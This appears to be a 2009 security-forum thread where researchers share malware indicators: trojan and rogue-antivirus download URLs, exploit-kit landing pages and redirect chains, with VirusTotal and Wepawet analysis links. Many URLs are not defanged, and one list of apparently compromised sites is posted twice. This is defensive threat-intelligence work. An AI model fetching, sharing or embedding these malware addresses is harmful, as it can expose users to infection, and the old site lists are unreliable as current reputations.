http://wepawet.iseclab.org/view.php?hash=84b34a34e05a7d00fe9198ae4d2d5424&t=1239555288&type=js

Code: [Select]
http://expfanclub.com/lom/index.php
http://wepawet.iseclab.org/view.php?hash=b410ff492fbd79ddfae0c102b7792993&t=1239555215&type=js

Code: [Select]
http://seofucking.com/vavilon/
http://wepawet.iseclab.org/view.php?hash=9d3ad64e279e1692d7490f208600c233&t=1239555455&type=js

Title: Re: daily something......
Post by: CkreM on April 12, 2009, 05:29:01 pm
the last one which leads to http://seofucking.com/vavilon/load.php is ambler trojan
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 07:19:24 am
195.88.80.41

Code: [Select]
hxxp://slk-downloads.com/promo.exe
VirusTotal: Trojan (http://www.virustotal.com/analisis/73c3f615c00dcc5718e7b6279fa0961a) 7/40 (17.5%)

76.73.21.186

config:
Code: [Select]
http://76.73.21.186/ldr/loadList.php?version=1
files:
Code: [Select]
hxxp://76.73.21.186/ldr/dl/zchMiB.exe
hxxp://76.73.21.186/ldr/dl/part.exe
hxxp://76.73.21.186/ldr/dl/minisvr4.exe (not found)
hxxp://76.73.21.186/ldr/dl/clkw.exe
hxxp://76.73.21.186/ldr/dl/websvr.exe

VirusTotal results:

zchMiB.exe - Trojan Autoit (http://www.virustotal.com/analisis/99e6d74df3bc3be73509bdfbe62aa4dc) 21/39 (53.85%)
part.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 21/40 (52.5%)
clkw.exe - Trojan Autoit (http://www.virustotal.com/analisis/85daff7fe1ee66559bda58efea4f4d90) 13/40 (32.50%)
websvr.exe - Trojan Autoit (http://www.virustotal.com/analisis/a2a067ff73362b9a3825659eb9b8b49e) 10/40 (25%)
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 09:32:38 am
194.165.4.77

Code: [Select]
hxxp://loyal-porno.com/scan/?
hxxp://loyal-porno.com/tube/?
hxxp://loyal-porno.com/codec.exe

1) Fake Scanner Page
2) Fake Codec Page
3) Trojan

VirusTotal (http://www.virustotal.com/analisis/dfde556533497ac71d555742d6d6f741) 7/40 (17.5%)
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 11:33:33 am
91.212.41.119

Code: [Select]
hxxp://tixwagoq.cn/in.cgi?6

redirect to exploit

91.212.41.119

Code: [Select]
hxxp://paylayos.cn/nuc/index.php

which load

Code: [Select]
hxxp://paylayos.cn/nuc/exe.php

then load the flash exploit

Code: [Select]
hxxp://paylayos.cn/nuc/spl/pdf.pdf

to finally load the executable

VirusTotal: Trojan TDSS (http://www.virustotal.com/analisis/823401c2f51007764b713f0894342507) 8/40 (20.00%)

Redirection Analysis: Wepawet (http://wepawet.iseclab.org/view.php?hash=ddc1c497688f76469d1f4ffa4f79902f&t=1239621305&type=js)
Title: Re: daily something......
Post by: sparsha on April 13, 2009, 06:55:31 pm
Code: [Select]

http://internetprotectedupdates.com/logo.bmp
http://protectionupdatecenter.com/wincontrol.dll

http://no-virus-pro-scan.com/11041/3/
http://files.pro-load-av-files.com/normal/setup_11041_3_1.exe

best-click-av1.info
http://download.best-click-av1.info/en/PE/install.exe

http://files.load-ms-av-soft.com/exe/setup_1_2_1.exe

http://dl.super-top-scan-pro.com/get/?pin=0&lnd=0&type=main
http://dl.anispy-storage-ms.com/get/?pin=0&lnd=0&type=main

http://in6iz.com/download/InternetAntivirusPro.exe
Title: Re: daily something......
Post by: Malware-Web-Threats on April 13, 2009, 07:14:24 pm
other links for "best-click-av1.info"

Code: [Select]
http://download.best-click-av1.info/install.php?campaign=mmb_227523872&country=en&counter=4&campaign=mmb_227523872&landid=4
http://download.best-click-av1.info/en/PE/N1.CAB
http://download.best-click-av1.info/en/PE/QWProtect.dll
http://download.best-click-av1.info/en/PE/svchost.exe

VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/05357372ad0d72bf7fbb682e49f05539) 33/40 (82.5%)
VirusTotal: Trojan FraudLoad (http://www.virustotal.com/analisis/8a46dd8ec034177dc10243b33ba3fd1b) 11/39 (28.21%)
VirusTotal: Trojan (http://www.virustotal.com/analisis/4e4aa550f799e703a19bff8939c14d56) 25/38 (65.79%)
VirusTotal: Trojan FakeAlert (http://www.virustotal.com/analisis/cc494b775cbce5316563c216335d1fc3) 28/38 (73.68%)
Title: Re: daily something......
Post by: sparsha on April 13, 2009, 07:14:56 pm
Sites related to Vxgame Trojan

Code: [Select]
http://onlinescanxp.com/?a=conf&code=502
antivirusxppro-2009.com
5-renus2008.com
http://free-web-scaners.biz/scan/?code=435

Title: Re: daily something......
Post by: lanvin on April 13, 2009, 07:31:56 pm
hxxp://w1.akc8.com/01/s.exe
hxxp://w1.ys8c.com/01/s.exe
hxxp://down.zhibo8.com/soft/spvod.exe
Title: Re: daily something......
Post by: CkreM on April 13, 2009, 09:32:06 pm
fake AV
Code: [Select]
http://lj3q.biz/av.26.0.exehttp://www.virustotal.com/analisis/b79cb1ea34600095ce75b3fccbfa5af3
Code: [Select]
http://megsw.com/av.26.0.exehttp://www.virustotal.com/analisis/d027aec77ed8c403b77c0b5b92e1ab97

Fake av loader
Code: [Select]
http://www.trart.net/vildanezik.net/album/default.exehttp://www.virustotal.com/analisis/14dbac952360d7d0672e372a75e9177b
Code: [Select]
http://porntubevidz.com/14.exehttp://www.virustotal.com/analisis/fc537777547fbeb743764d71e97edf4f

Trojan
Code: [Select]
http://216.195.58.114:35813/getLoader.php?p=1zHniWUaKiCQthttp://www.virustotal.com/analisis/41394ae810a5b070c6a4a48f664a75b5
Trojan
Code: [Select]
http://totalmic.if.ua/ftp2.exehttp://www.virustotal.com/analisis/049e37d45db1e083ce5c3def69aac306
Trojan
Code: [Select]
http://banksguard.com/pics/ncr.exehttp://www.virustotal.com/analisis/58dcebabde517dd1c0e38257b43a9e62
Trojan
Code: [Select]
http://auf-jeder.com/123.exehttp://www.virustotal.com/analisis/55f110a5dd1d46d6d29bcab867dd123c
Title: Re: daily something......
Post by: sparsha on April 14, 2009, 04:09:42 pm
Sites related to Rogue security applications

Code: [Select]
system-cleaner.net/load/setup.msi
tantispyware.com/load/setup.msi
webantispy.com/load/setup.msi
pantispyware09.com/dwn/setup.exe
Title: Re: daily something......
Post by: RS-232 on April 14, 2009, 07:01:53 pm
Quote
hxxp://usrv03.ru/index.php?x=1
hxxp://usrv03.ru/pdf_1.php?id=3304

http://wepawet.iseclab.org/view.php?hash=fcb37c12aa47d8d4911a81e3d9749c95&t=1239735089&type=js
http://anubis.iseclab.org/?action=result&task_id=1ec2e01cf8ff3f72431c9490b047d70ef&format=html
Title: Re: daily something......
Post by: GmG on April 14, 2009, 07:09:03 pm
Code: [Select]
http://antivirusxp09.com/img/
http://antivirusxp09.com/new/index.php
http://antivirusxp09.com/new2/index.php
http://antivirusxp09.com/new3/index.php

http://wepawet.iseclab.org/view.php?hash=1502f37ba459292fae9c5cffd524c714&t=1239736282&type=js
http://anubis.iseclab.org/?action=result&task_id=1f6f85e9801c0bf942dd45076c2ebac87
http://www.virustotal.com/analisis/5aca8d47cc3b7b20cb77529cede96a6a
Title: Re: daily something......
Post by: Malware-Web-Threats on April 15, 2009, 12:30:51 am
Rogue Fake AV

Code: [Select]
hxxp://star4scan.com
hxxp://scan6easy.com
hxxp://scan6fast.com
hxxp://lux4scan.com
hxxp://luxscan4.com
hxxp://msscanner-files-av.com/200109/scan/
Title: Re: daily something......
Post by: CkreM on April 15, 2009, 05:10:20 am
Trojan:
Code: [Select]
79.174.64.13/out.exehttp://www.virustotal.com/analisis/7bca934bb8e377eebe4edebfebf8523a
Trojan:
Code: [Select]
mal-waredoc.com/load.php?id=2http://www.virustotal.com/analisis/11576255e0680454c54efa2766cc9435
Trojan
Code: [Select]
s0si.ru/TT/load.phphttp://www.virustotal.com/analisis/a4a966837adda2c3cc34d981c93d93e6
trojan:
Code: [Select]
tradepark.info/photos/load.phphttp://www.virustotal.com/analisis/17a9c3d18044191a539072b82821e766
Trojan:
Code: [Select]
95.129.144.186/gf/ma.exehttp://www.virustotal.com/analisis/5e2316512208bcc9e0b38856182c39b1

Fake AV:
Code: [Select]
95.129.144.186/gf/swp.exehttp://www.virustotal.com/analisis/d05a9eb3e36e93f5fbe35d9375892596
rogue:
Code: [Select]
spy-wareprotector2009.com
Title: Re: daily something......
Post by: SysAdMini on April 15, 2009, 09:34:25 am
Code: [Select]
kroto.biz/myy/index.php
kroto.biz/myy/cache/readme.pdf
kroto.biz/myy/cache/flash.swf
kroto.biz/myy/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=ba0ba1b23890b2b70125f744960bd863&t=1239788253&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40

Code: [Select]
kroto.biz/myy/index.php
kroto.biz/ins/cache/readme.pdf
kroto.biz/ins/cache/flash.swf
kroto.biz/ins/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=e7fd2ee3c218c66ad961163569df5dca&t=1239788768&type=js
http://www.virustotal.com/analisis/1176e423edaf89cf29ca7299fac7eefd 0/40

Code: [Select]
kroto.biz/opi/index.php
kroto.biz/opi/cache/readme.pdf
kroto.biz/opi/cache/flash.swf
kroto.biz/opi/load.php?id=4
http://wepawet.cs.ucsb.edu/view.php?hash=a21882d077d3295aa223d46ef0e61158&t=1239788777&type=js
http://www.virustotal.com/analisis/c7363f8f6efe964c3c07a32bbbd6e93e 5/40

Title: Re: daily something......
Post by: SysAdMini on April 15, 2009, 11:58:10 am
redirector, play with the number
Code: [Select]
cjtrader.biz/in.php?s=1
redirects to Fake AV
Code: [Select]
tdncgo2009.com/?uid=36&pid=3
Fake AV
Code: [Select]
http://virussweeper-scanvirus.net/?p=nqd2a16poZ2eYJqMoKNqq6iQtFPEmZSjj8KqqVeYlJjXnrmMiXl%2BhIo%3D
vswpr.googlecode.com/svn/trunk/ReleaseXP.exe
http://www.virustotal.com/de/analisis/29d5d657b1b1e9b49b7ba3ca26f76fbe 2/40

Title: Re: daily something......
Post by: Malware-Web-Threats on April 15, 2009, 10:08:34 pm
All rogue

74.54.156.234

Code: [Select]
hxxp://download.adwarealert.com/vistasetup.exe
hxxp://download.adwarealert.com/setupxv.exe
hxxp://download.adwarealert.com/setup.exe
hxxp://download.adwarebot.com/setup.exe
hxxp://download.adwarebot.com/setupxv.exe
hxxp://download.antispyware.com/setup.exe
hxxp://download.antispyware.com/setupxv.exe
hxxp://download.antispyware2009.com/setup.exe
hxxp://download.antispywarebot.com/vistasetup.exe
hxxp://download.antispywarebot.com/setupxv.exe
hxxp://download.antispywarebot.com/setup.exe
hxxp://download.registrysmart.com/vistasetup.exe
hxxp://download.registrysmart.com/setupxv.exe
hxxp://download.registrysmart.com/setup.exe
hxxp://download.errorsweeper.com/vistasetup.exe
hxxp://download.errorsweeper.com/setup.exe
hxxp://download.privacycontrol.com/vistasetup.exe
hxxp://download.privacycontrol.com/setup.exe
hxxp://download.regclean.com/setupxp.exe
hxxp://download.regclean.com/setup.exe
hxxp://download.regclean.com/vistasetup.exe
hxxp://download.errorsmart.com/setup.exe
hxxp://download.errorsmart.com/vistasetup.exe
hxxp://download.regsweep.com/setupxv.exe
hxxp://download.regsweep.com/setup.exe
hxxp://download.regsweep.com/vistasetup.exe
hxxp://errorsmartdownload.com/setupxv.exe
hxxp://errorsmartdownload.com/setup.exe

75.125.200.226

Code: [Select]
hxxp://restore-pc.com/setup.php
hxxp://www.adwarealert.com/setup.exe
hxxp://evidenceeraser.com/setup.exe
Title: Re: daily something......
Post by: MysteryFCM on April 16, 2009, 04:14:07 am
Code: [Select]
www.r6c8d.cn/qvodsetupplus.exe
195.88.80.150/myfiles/138/v3/file.exe
u8.wgcn8.com/sb/ok.exe
www.bem1010.pagebr.com/bin/dat/.ubbs/videos.exe
www.hotlinkfiles.com/files/1473144_c3k20/wr-1-1974_3.exe
files.ms-load-av.com/exe/setup_200002.exe
ugh-softwares.com/promo.exe
winpc-antivirus.com/winav.exe
millanchannel.info/uddb.exe
www.infindha.com.br/images/ttopus.zip
web.cplnn.com/mmf32.exe
76.73.21.186/ploads/eula.exe
203.112.128.95/images/cgibin.exe
www.marrento.com/msg/messenger_2.exe
blog.npo-mash.org/nucleus/plugins/baby.jpg
94.247.2.123/Install.exe
lvdesign2.uuuq.com/creating/Instalador.gif
fullandtotalsecurity.com/install/ws.zip
91.212.65.12/o9s833f/uerty/wtaqlu.exe
www.adam.com.au/beaumont/virus/stinger.exe
webseguropronta.pagebr.com/kl/2.jpg
soft6.com/news/detail.asp?id=12557
sub.njcc.edu.cn/njhyxxx/index.asp
www.transport.net.cn
tongji.ctei.gov.cn
www.cqyfs.gov.cn
bbs.gddgw.com
blog.cnhubei.com/usera1/5589/index.html
medicine1.bjmu.edu.cn/department/bingli/index.htm
www.xlcedu.com
szsjmg.cn
xwb.hebtu.edu.cn/lwws/index.asp
www.0571auto.cn/showauto.asp?autoid=4322
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.668662.cn
585828.cn
www.688166.com
www.900388.com
www.338cp.com
www.cpw8282.cn
www.gp5588.com
www.998666.com
www.559678.com
www.552500.com
600976.com
www.34047.com
www.592233.com
www.678009.com
678009.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.tjdeda.com
www.aouchina.com
www.001jk.net
xinan.ccw.com.cn/shangpin.asp?id=39687
www.haobaobe.cn/sort/1_1.htm
www.jzjgxx.gov.cn
www.xacf168.com
www.jjwyy.com
szsjmg.cn
tongji.ctei.gov.cn
www.zgcy.gov.cn/videonews/index.asp
www.cqyfs.gov.cn
blog.cnhubei.com/usera1/5589/index.html
www.lygmzzjj.gov.cn
cae.nuaa.edu.cn/ftp/educ.htm
www.xachangfang.com
xx2.mao9988.cn
tougao.cnhubei.com
enews.guitarchina.com/picture
cae.nuaa.edu.cn/ftp/educ.htm
www.vip2009-qq.com
qqtx-10.com
alww-ts.cn
www.piypay.cn
www.163niu.cn
www.qqtx-10.com
u7.wgcn8.com/cj/a1.exe
ipkipk.3322.org/ipk.exe
u1.wgcn8.com/la/L7.exe
u2.wgcn8.com/gz/G1.exe
u9.wgcn8.com/cj/a2.exe
u4.wgcn8.com/gb/B7.exe
w1.aoc8.com/01/e1.exe
www.3d606.cn
www.gp890.com
www.539238.com
www.cp137.com
600906.com
cp137.com
www.3d3567.cn
www.wxdz7788.cn
www.cp05777.cn
www.44789.com
332336.com
331888.com
www.007788.net
www.331888.com
2009999.com
www.658658.cn
www.45765.com
www.113111.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.jjsga.gov.cn
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.haobaobe.cn
www.cacda.org.cn
www.transport.net.cn
www.jaycn.com
www.bjjdxy.com.cn
qqszn.cn/qqd
qqfof.com
www.yometop.cn
www.cvbnmdgesc.cn/1.exe
w5.ys8c.com/05/s.exe
sohu.go.8866.org
www.dnfdv.com
www.worldpersondictionary.com/5/C/C20.htm
www.worldexperts.org/9/T/T22/T22-1.htm
www.worlddailyweb.com
www.world-ad.com
www.chineseedu.org
www.chinesefamousdoctor.org
tour.dahe.cn/travelsite/PicShow.asp?tsid=349&dv_topicid=1533&picid=1301
www.jinleyuan.com/index.asp?ty=3
qq.200.net
radio.zjfc.edu.cn
www.oiac.com.cn/Df_web/index.asp
www.colour777.com
www.chinamf.com
www.qingdaochina.com
stu.syict.edu.cn
www.lyanjie.com
aes-online.ycu.jx.cn
hangji.nchu.jx.cn
ce.scu.edu.cn/bkjx/detail.asp?id=206
sph.bjmu.edu.cn/Html/downloads/index.htm
hkml.hainan.net/bszn/blsx.asp?newsId=394
job.icxo.com/corpJobIndex.do
www.yayunyq.com
www.cnhuishou.com
www.xawyrd.gov.cn/gly/wj/flashly/show.asp?id=17
www.nmg3j.com
www.jxgzsz.com/yw/readnews.asp?newsid=42
www.00186755.net
www.123-4.net
www.zjerhu.com/product.asp
www.chinese-chemical.net
www.szbus.com.cn
www.njrenchuang.com
www.gpec.cn
test.200.net
www.0571auto.cn
www.bjnissan.com.cn
www.jhxmzs.com
www.xsx.com.cn
zhaoban.bbxy.edu.cn/news_view.asp?newsid=413
www.hnemap.com/PublicWebUI/index.aspx
www.jinhaiyang-fdc.com.cn/d15573637
www.wyren.com.cn/d15542574/12.htm
www.lvzhou.com.cn
xstj.spe-edu.net/readnews.asp?newsid=132
www.xjjmh.com
www.zw001.net/index.asp
www.b3018.cn/article/4631.htm
www.ist.com.cn/news/rongyu/rongyu.html
www.lm188.com.cn/d3181052
www.4241.com/data.asp?dataid=2899
yyxz2.nhxy.com
www.tw103.com/soft/softcoshow.asp?id=1136
www.5tj.com
211.80.243.105/dlib/list.asp?lang=gb
www.goodsisters.cn/c3338
www.jeast.net/list.asp?classid=0
www.gkjiaolian.cn
www.lsit.net
www.cliy.com.cn/home/yuefu/index.asp
www.best4c.cn/star/10536
www.lvzhou.com.cn
www.lego123.com
www.p800.com
gbz.ycu.jx.cn
www.liuqiaoyun.com.cn
www.sdlfyz.cn/d5565381/4.htm
qqhx.uugua.cn/?196
rsz.ccjy.cn/school/gzzd/sfgl.htm
www.batongkeji.cn/d13462609
www.fsjy.cn/xg/xgkxfzg/onews.asp?id=58
www.adear.com.cn/tz
www.999art.com.cn/blog/blog.asp?name=ysf8s&month=2008-1
www.chinawatch.net
www.73ren.com/bbs/viewthread.php?tid=1755
www.cdxgt.com/product.asp?categoryid=0000100002
xy2mibao163.com.cn
x22qq.cn
s234.8866.org/1.exe
w1.akc8.com/01/s.exe
gg.onegreen.net/funshioninstall_c11407.exe
w1.163.com7w.com/01/o.exe
w9.akc8.com/09/s.exe
dlqlb.3322.org/box.exe
www.flczx.cn
www.cpzlw.cn
www.fc238.cn
www.fulicaipiao.com
www.cp728.com
www.zh-cw.com
www.68146.cn
tc908.com
www.cp110.com
www.dzhzqw.com
www.gpw858.cn
www.cp6158.cn
www.8688cp.cn
cp80998.cn
www.gcw58.cn
www.665578.com
www.sddz78.cn
www.163in.com
www.lf288.cn
www.hkying.cn
bo2288.com
www.bet2008.cc
www.wk988.com
www.maybao888.com
www.tt9898.com
www.66666ball.net
hk6669.com
hk6669.com
www.1688nba.com
www.mh48.com
899266.com
www.hk633.com
www.hkball.net.ru
www.238555.com
666128.com
www.zq5599.com
www.238111.com
www.gtx888.com
www.bet866.com
www.228cp.com
www.366555.cn
www.229899.cn
www.zh033.com
www.flcpglzx.cn
www.cp3555.com
www.84882.com
www.234444.com
www.789977.com
www.3d6848.cn
www.229899.cn
234444.com
www.1601800.com
www.zzwwong.cn
www.qiu7.cn
www.zq9a.cn
www.uugoal.com
qvod.com-2.cn/QvodSetup3.exe
keowo.cn/zip/pic02.exe
qyyjly.com/ie.exe
www.10000kp.cn
cfqqy.com
kk.hh51888.cn/cfqqy.com/1.htm
www.qqcfq.cn
ksss.us/taobao/index10.htm
jz2009jx.com
www.x-ba.com.cn
www.npgysy.com
invest.eefoo.com/jd/sdpx/200904/02-1313860.html
welcome.xz.vnet.cn
iom.ccom.edu.cn
auto1.zbinfo.net/jhby
www.zhonghuiaf.com
www.ghly.com
www.clima.org.cn
www.syzsrc.com/
www.ziweixing.com
www.ktv8848.cn/fhtz_info.asp?id=1614
www.51clean.com/co_cp_view.asp?id=205
www.hnyisheng.com/about.asp
www.sdxunda.cn
www.xtscl.cn
www.kimspetschool.cn
www.wow175.cn/news_display.asp?id=34
house.c029.com/newhouse/newhouse_dc.asp?id=458
www.qsxx.cn
gdtemei.cn
www.nb-water.com
www.csdnet.org/ynsm_show.asp?ID=9
www.keqi.com.cn
sph.bjmu.edu.cn
www.gpec.cn
www.langfangtv.com/html/zixun/index.html
www.towinner.com

Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103
Title: Re: daily something......
Post by: CkreM on April 16, 2009, 05:33:33 am
Code: [Select]
www.r6c8d.cn/qvodsetupplus.exe
195.88.80.150/myfiles/138/v3/file.exe
u8.wgcn8.com/sb/ok.exe
www.bem1010.pagebr.com/bin/dat/.ubbs/videos.exe
www.hotlinkfiles.com/files/1473144_c3k20/wr-1-1974_3.exe
files.ms-load-av.com/exe/setup_200002.exe
ugh-softwares.com/promo.exe
winpc-antivirus.com/winav.exe
millanchannel.info/uddb.exe
www.infindha.com.br/images/ttopus.zip
web.cplnn.com/mmf32.exe
76.73.21.186/ploads/eula.exe
203.112.128.95/images/cgibin.exe
www.marrento.com/msg/messenger_2.exe
blog.npo-mash.org/nucleus/plugins/baby.jpg
94.247.2.123/Install.exe
lvdesign2.uuuq.com/creating/Instalador.gif
fullandtotalsecurity.com/install/ws.zip
91.212.65.12/o9s833f/uerty/wtaqlu.exe
www.adam.com.au/beaumont/virus/stinger.exe
webseguropronta.pagebr.com/kl/2.jpg
soft6.com/news/detail.asp?id=12557
sub.njcc.edu.cn/njhyxxx/index.asp
www.transport.net.cn
tongji.ctei.gov.cn
www.cqyfs.gov.cn
bbs.gddgw.com
blog.cnhubei.com/usera1/5589/index.html
medicine1.bjmu.edu.cn/department/bingli/index.htm
www.xlcedu.com
szsjmg.cn
xwb.hebtu.edu.cn/lwws/index.asp
www.0571auto.cn/showauto.asp?autoid=4322
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.668662.cn
585828.cn
www.688166.com
www.900388.com
www.338cp.com
www.cpw8282.cn
www.gp5588.com
www.998666.com
www.559678.com
www.552500.com
600976.com
www.34047.com
www.592233.com
www.678009.com
678009.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.tjdeda.com
www.aouchina.com
www.001jk.net
xinan.ccw.com.cn/shangpin.asp?id=39687
www.haobaobe.cn/sort/1_1.htm
www.jzjgxx.gov.cn
www.xacf168.com
www.jjwyy.com
szsjmg.cn
tongji.ctei.gov.cn
www.zgcy.gov.cn/videonews/index.asp
www.cqyfs.gov.cn
blog.cnhubei.com/usera1/5589/index.html
www.lygmzzjj.gov.cn
cae.nuaa.edu.cn/ftp/educ.htm
www.xachangfang.com
xx2.mao9988.cn
tougao.cnhubei.com
enews.guitarchina.com/picture
cae.nuaa.edu.cn/ftp/educ.htm
www.vip2009-qq.com
qqtx-10.com
alww-ts.cn
www.piypay.cn
www.163niu.cn
www.qqtx-10.com
u7.wgcn8.com/cj/a1.exe
ipkipk.3322.org/ipk.exe
u1.wgcn8.com/la/L7.exe
u2.wgcn8.com/gz/G1.exe
u9.wgcn8.com/cj/a2.exe
u4.wgcn8.com/gb/B7.exe
w1.aoc8.com/01/e1.exe
www.3d606.cn
www.gp890.com
www.539238.com
www.cp137.com
600906.com
cp137.com
www.3d3567.cn
www.wxdz7788.cn
www.cp05777.cn
www.44789.com
332336.com
331888.com
www.007788.net
www.331888.com
2009999.com
www.658658.cn
www.45765.com
www.113111.com
www.97980.com
www.888897.cn
www.884886.com
www.mk55.cn
www.jjsga.gov.cn
zsb.xpu.edu.cn/2009zsb/z2-1.html
www.haobaobe.cn
www.cacda.org.cn
www.transport.net.cn
www.jaycn.com
www.bjjdxy.com.cn
qqszn.cn/qqd
qqfof.com
www.yometop.cn
www.cvbnmdgesc.cn/1.exe
w5.ys8c.com/05/s.exe
sohu.go.8866.org
www.dnfdv.com
www.worldpersondictionary.com/5/C/C20.htm
www.worldexperts.org/9/T/T22/T22-1.htm
www.worlddailyweb.com
www.world-ad.com
www.chineseedu.org
www.chinesefamousdoctor.org
tour.dahe.cn/travelsite/PicShow.asp?tsid=349&dv_topicid=1533&picid=1301
www.jinleyuan.com/index.asp?ty=3
qq.200.net
radio.zjfc.edu.cn
www.oiac.com.cn/Df_web/index.asp
www.colour777.com
www.chinamf.com
www.qingdaochina.com
stu.syict.edu.cn
www.lyanjie.com
aes-online.ycu.jx.cn
hangji.nchu.jx.cn
ce.scu.edu.cn/bkjx/detail.asp?id=206
sph.bjmu.edu.cn/Html/downloads/index.htm
hkml.hainan.net/bszn/blsx.asp?newsId=394
job.icxo.com/corpJobIndex.do
www.yayunyq.com
www.cnhuishou.com
www.xawyrd.gov.cn/gly/wj/flashly/show.asp?id=17
www.nmg3j.com
www.jxgzsz.com/yw/readnews.asp?newsid=42
www.00186755.net
www.123-4.net
www.zjerhu.com/product.asp
www.chinese-chemical.net
www.szbus.com.cn
www.njrenchuang.com
www.gpec.cn
test.200.net
www.0571auto.cn
www.bjnissan.com.cn
www.jhxmzs.com
www.xsx.com.cn
zhaoban.bbxy.edu.cn/news_view.asp?newsid=413
www.hnemap.com/PublicWebUI/index.aspx
www.jinhaiyang-fdc.com.cn/d15573637
www.wyren.com.cn/d15542574/12.htm
www.lvzhou.com.cn
xstj.spe-edu.net/readnews.asp?newsid=132
www.xjjmh.com
www.zw001.net/index.asp
www.b3018.cn/article/4631.htm
www.ist.com.cn/news/rongyu/rongyu.html
www.lm188.com.cn/d3181052
www.4241.com/data.asp?dataid=2899
yyxz2.nhxy.com
www.tw103.com/soft/softcoshow.asp?id=1136
www.5tj.com
211.80.243.105/dlib/list.asp?lang=gb
www.goodsisters.cn/c3338
www.jeast.net/list.asp?classid=0
www.gkjiaolian.cn
www.lsit.net
www.cliy.com.cn/home/yuefu/index.asp
www.best4c.cn/star/10536
www.lvzhou.com.cn
www.lego123.com
www.p800.com
gbz.ycu.jx.cn
www.liuqiaoyun.com.cn
www.sdlfyz.cn/d5565381/4.htm
qqhx.uugua.cn/?196
rsz.ccjy.cn/school/gzzd/sfgl.htm
www.batongkeji.cn/d13462609
www.fsjy.cn/xg/xgkxfzg/onews.asp?id=58
www.adear.com.cn/tz
www.999art.com.cn/blog/blog.asp?name=ysf8s&month=2008-1
www.chinawatch.net
www.73ren.com/bbs/viewthread.php?tid=1755
www.cdxgt.com/product.asp?categoryid=0000100002
xy2mibao163.com.cn
x22qq.cn
s234.8866.org/1.exe
w1.akc8.com/01/s.exe
gg.onegreen.net/funshioninstall_c11407.exe
w1.163.com7w.com/01/o.exe
w9.akc8.com/09/s.exe
dlqlb.3322.org/box.exe
www.flczx.cn
www.cpzlw.cn
www.fc238.cn
www.fulicaipiao.com
www.cp728.com
www.zh-cw.com
www.68146.cn
tc908.com
www.cp110.com
www.dzhzqw.com
www.gpw858.cn
www.cp6158.cn
www.8688cp.cn
cp80998.cn
www.gcw58.cn
www.665578.com
www.sddz78.cn
www.163in.com
www.lf288.cn
www.hkying.cn
bo2288.com
www.bet2008.cc
www.wk988.com
www.maybao888.com
www.tt9898.com
www.66666ball.net
hk6669.com
hk6669.com
www.1688nba.com
www.mh48.com
899266.com
www.hk633.com
www.hkball.net.ru
www.238555.com
666128.com
www.zq5599.com
www.238111.com
www.gtx888.com
www.bet866.com
www.228cp.com
www.366555.cn
www.229899.cn
www.zh033.com
www.flcpglzx.cn
www.cp3555.com
www.84882.com
www.234444.com
www.789977.com
www.3d6848.cn
www.229899.cn
234444.com
www.1601800.com
www.zzwwong.cn
www.qiu7.cn
www.zq9a.cn
www.uugoal.com
qvod.com-2.cn/QvodSetup3.exe
keowo.cn/zip/pic02.exe
qyyjly.com/ie.exe
www.10000kp.cn
cfqqy.com
kk.hh51888.cn/cfqqy.com/1.htm
www.qqcfq.cn
ksss.us/taobao/index10.htm
jz2009jx.com
www.x-ba.com.cn
www.npgysy.com
invest.eefoo.com/jd/sdpx/200904/02-1313860.html
welcome.xz.vnet.cn
iom.ccom.edu.cn
auto1.zbinfo.net/jhby
www.zhonghuiaf.com
www.ghly.com
www.clima.org.cn
www.syzsrc.com/
www.ziweixing.com
www.ktv8848.cn/fhtz_info.asp?id=1614
www.51clean.com/co_cp_view.asp?id=205
www.hnyisheng.com/about.asp
www.sdxunda.cn
www.xtscl.cn
www.kimspetschool.cn
www.wow175.cn/news_display.asp?id=34
house.c029.com/newhouse/newhouse_dc.asp?id=458
www.qsxx.cn
gdtemei.cn
www.nb-water.com
www.csdnet.org/ynsm_show.asp?ID=9
www.keqi.com.cn
sph.bjmu.edu.cn
www.gpec.cn
www.langfangtv.com/html/zixun/index.html
www.towinner.com

Posted to:
http://bbs.vc52.cn/redirect.php?tid=82103


gogo sysadm  ;D
Title: Re: daily something......
Post by: CkreM on April 16, 2009, 06:14:43 am
Trojan Webmoner
Code: [Select]
wiz2wix.com/out.exehttp://www.virustotal.com/analisis/b4c3c35969ab9091652570b7bb8f83ae
Ftp Stealer
Code: [Select]
tayforlive.ru/ftp_G.exehttp://www.virustotal.com/analisis/978f0644b6375647f10d3043123aa537
Trojan:
Code: [Select]
ftpgeoit.com/exe/9sys270.exehttp://www.virustotal.com/analisis/bdaf84af42d6fe1c146ae4a68479674b
Trojan:
Code: [Select]
ftpgeoit.com/exe/gld.exehttp://www.virustotal.com/analisis/2813968773754764f195f9abc458672a
Trojan:
Code: [Select]
ftpgeoit.com/exe/lich.exehttp://www.virustotal.com/analisis/a3d56941a5206226d019d76071f9c354
Exploits/trojan:
Code: [Select]
homesy.net/mu/index.phphttp://wepawet.iseclab.org/view.php?hash=943da6e620aeb897e9586e68771d1467&t=1239861325&type=js

Redirect to rogue:
Code: [Select]
Blogtransaction.cn/in.cgi?9
Bankinggolf.cn/in.cgi?9
Acousticnail.cn/in.cgi?9
ay.goldrushclub.cn/in.cgi?9
all redirect to
Code: [Select]
1000league.com/in.cgi?9 (which is on MDL)
http://wepawet.cs.ucsb.edu/view.php?hash=a67a5af0914956eaf26cb260d4632a3e&t=1239830585&type=js
Then to Rogue:
Code: [Select]
msscan-files-antivir.com/200109/scan/
Title: Re: daily something......
Post by: RS-232 on April 16, 2009, 11:43:26 am
Here's a nifty pdf exploit...
Quote
hxxp://d0lphin.biz/max/in.php
Result: 4/40 (10%)
http://www.virustotal.com/analisis/de6f75f3c03f508662872923ff3c73bb

Here's what it returns for the time being...
